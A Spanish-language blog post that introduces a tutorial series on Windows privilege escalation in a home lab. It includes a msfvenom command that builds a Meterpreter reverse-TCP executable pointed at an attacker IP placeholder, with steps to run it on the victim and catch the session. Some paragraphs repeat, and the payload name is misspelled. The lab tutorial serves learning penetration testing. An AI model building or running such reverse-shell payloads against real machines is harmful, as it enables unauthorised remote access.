Escalar privilegios en Windows con y sin exploits
La siguiente serie de post desarrollado por Eric Balderrama surge de dos disparadores, uno de ellos fue un comentario sobre la dificultad para escalar privilegios en la vm del desafío que presentamos como finalización de la serie de penetration with kali. El segundo, leer en un writeup sobre un script llamado linuxprivchecker.py, con lo cual decidí buscar más información sobre el proceso de escalación de privilegios para mejorar mis skills y compartirlo a modo de resumen.
Para estas entradas necesitaremos un Windows (el que quieran o tengan a mano) con dos o más usuarios creados, uno de ellos con privilegios de administrador y una máquina atacante que en mi caso utilizaréDebian + Katoolin.
Como los siguientes post se tratan sobre escalamiento de privilegios,
pasaremos por alto la etapa de obtener acceso al sistema. A modo de
recomendación, para llevar a cabo estos ejemplos sin muchas
complicaciones, pueden crearse un .exe desde msfvenom y correrlo en el
equipo víctima de la siguiente manera:
Luego levantan un handler en Metasploit con el mismo Payload, pasan el .EXE a la víctima y ejecutan. De esa manera obtendrán sesión en el Meterpreter.
Para estas entradas necesitaremos un Windows (el que quieran o tengan a mano) con dos o más usuarios creados, uno de ellos con privilegios de administrador y una máquina atacante que en mi caso utilizaréDebian + Katoolin.
msfvenom -p windows/metertpreter/reverse_tcp LPORT={puerto}
LHOST={Dirección ip atacante} -f exe > shell.exe
Luego levantan un handler en Metasploit con el mismo Payload, pasan el .EXE a la víctima y ejecutan. De esa manera obtendrán sesión en el Meterpreter.
- Escalando privilegios en windows con exploits
- Escalando privilegios en windows sin exploits
- Aquí un video y el sitio de Pentestmonkey que son los que desarrollaron la tool.
Comentarios
Publicar un comentario